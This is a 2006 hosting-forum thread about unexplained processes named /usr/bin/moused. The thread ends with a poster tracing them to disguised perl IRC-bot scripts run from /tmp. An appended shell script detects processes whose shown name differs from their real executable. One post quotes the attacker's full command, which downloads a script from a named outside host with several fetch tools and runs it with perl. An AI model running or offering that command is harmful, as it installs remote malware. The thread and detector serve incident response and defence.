Web Hosting Talk

/usr/bin/moused


phark
07-06-2006, 07:20 PM
I have a few dozen entries running that show up as "/usr/bin/moused".

Anyone have a clue about this?

Much appreciated!

Jeff - Exceed
07-06-2006, 07:52 PM
It's your console mouse daemon.

phark
07-06-2006, 08:09 PM
That's what I suspected... I wonder what was making it go haywire.... someone at the datacenter playing? Oh well, I killed it a few times and it stopped.

eth00
07-06-2006, 08:18 PM
If you do not need the mouse you can also remove the rpms which run it :)

phark
07-06-2006, 08:23 PM
If you do not need the mouse you can also remove the rpms which run it :)

Good point, thanks! :peace:

AndyTork
08-17-2006, 03:12 AM
I have a similar issue

Lots of /usr/bin/moused tasks running, all using lots of CPU (up to 26%)

I have no /usr/bin/moused file

I have removed the gpm rpm, which is the console mouse service

Any ideas?

Ramprage
08-17-2006, 03:34 AM
Sounds like a perl script or malicious binary running using a fake name.

Is it running as the nobody user or under apache? Then it's bad :)

AndyTork
08-17-2006, 03:48 AM
Yes it is,

Just ran a trace on it and it is bad

It's trying to connect out to some website via IP address and connect via SSH

No idea where it has come from, how it got installed and what's recreating it

Any suggestions where to go from here tracking it ?

Or know a good security expert that could go fix it ?

Any help / pointers are appreciated

AndyTork
08-17-2006, 09:15 AM
Found a couple of nasty (but very well programmed) perl scripts that connect to IRC
and also download from a couple of preconfigured URLs

They were running from /tmp (should have secured tmp better, silly me), assuming
Files were gb.txt.1 & gugl.txt.1

They disguised themselves as /usr/bin/moused and /usr/sbin/usbd

They came from http://nagar.ro/

using the
"cd /tmp;wget http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;curl -O http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;lwp-download http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;lynx -source http://nagar.ro/gb.txt >gb.txt;perl gb.txt;fetch http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb;GET http://nagar.ro/gb.txt;mv gb.txt .manb;perl .manb; touch /tmp/sess_b62dw41904ee88gu

I have totally revised the security and checked against all online "Howto's" and security alerts; guess this will teach me to be a little more conscious of these things.
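The thread's diagnosis (a process calling itself /usr/bin/moused while no such file exists, really a perl script started from /tmp under the web server's user) can be turned into a quick check. This is an added example, not code from the thread or from any of its posters: it compares the name a process shows in ps (argv[0] from /proc/PID/cmdline) with the binary the kernel actually mapped (/proc/PID/exe). PROC_ROOT, check_pid, scan_procs and make_fixture are hypothetical names; the fixture tree and its uids are constructed so the script runs offline.

```shell
#!/bin/sh
# PROC_ROOT defaults to the live /proc; the constructed fixture below
# lets the same logic run without root on a non-infected machine.
PROC_ROOT="${PROC_ROOT:-/proc}"

# check_pid PID: print "SUSPECT pid claimed real uid" and return 0 when the
# process claims an absolute path that differs from the executable it was
# started from (or that is not on disk at all); return 1 if consistent.
check_pid() {
    dir="$PROC_ROOT/$1"
    [ -r "$dir/cmdline" ] || return 1
    # argv[0] is whatever the process chose to show, i.e. what ps/top print
    claimed=$(tr '\0' '\n' < "$dir/cmdline" | head -n 1)
    case "$claimed" in /*) ;; *) return 1 ;; esac   # only absolute claims
    # exe is the real execve'd file; unreadable ('?') for other users' pids
    real=$(readlink "$dir/exe" 2>/dev/null || echo '?')
    real=${real% (deleted)}
    uid=$(awk '/^Uid:/ {print $2}' "$dir/status" 2>/dev/null)
    if [ "$real" != '?' ] && [ "$real" != "$claimed" ]; then
        echo "SUSPECT $1 $claimed $real ${uid:-?}"; return 0
    fi
    if [ "$real" = '?' ] && [ ! -e "$claimed" ]; then
        echo "SUSPECT $1 $claimed $real ${uid:-?}"; return 0
    fi
    return 1
}

# scan_procs: run check_pid over every numeric entry under PROC_ROOT.
scan_procs() {
    for d in "$PROC_ROOT"/[0-9]*; do
        [ -d "$d" ] && check_pid "${d##*/}" || true
    done
    return 0
}

# make_fixture: constructed /proc-like tree with one spoofed process (a perl
# interpreter calling itself /usr/bin/moused, uid 99 = nobody on Red Hat
# style systems) and one honest /bin/sh. Prints the fixture directory.
make_fixture() {
    fx=$(mktemp -d)
    mkdir "$fx/4242" "$fx/4343"
    printf '/usr/bin/moused\0' > "$fx/4242/cmdline"
    ln -s /usr/bin/perl "$fx/4242/exe"
    printf 'Name:\tmoused\nUid:\t99\t99\t99\t99\n' > "$fx/4242/status"
    printf '/bin/sh\0-c\0sleep 1\0' > "$fx/4343/cmdline"
    ln -s /bin/sh "$fx/4343/exe"
    printf 'Name:\tsh\nUid:\t0\t0\t0\t0\n' > "$fx/4343/status"
    echo "$fx"
}

demo_fixture=$(make_fixture)
PROC_ROOT="$demo_fixture" scan_procs      # reports only pid 4242
rm -rf "$demo_fixture"
```

Against the live /proc run it as root so every /proc/PID/exe is readable; a hit whose real binary is an interpreter or lives under /tmp, running as nobody or the apache user, is the pattern described in this thread.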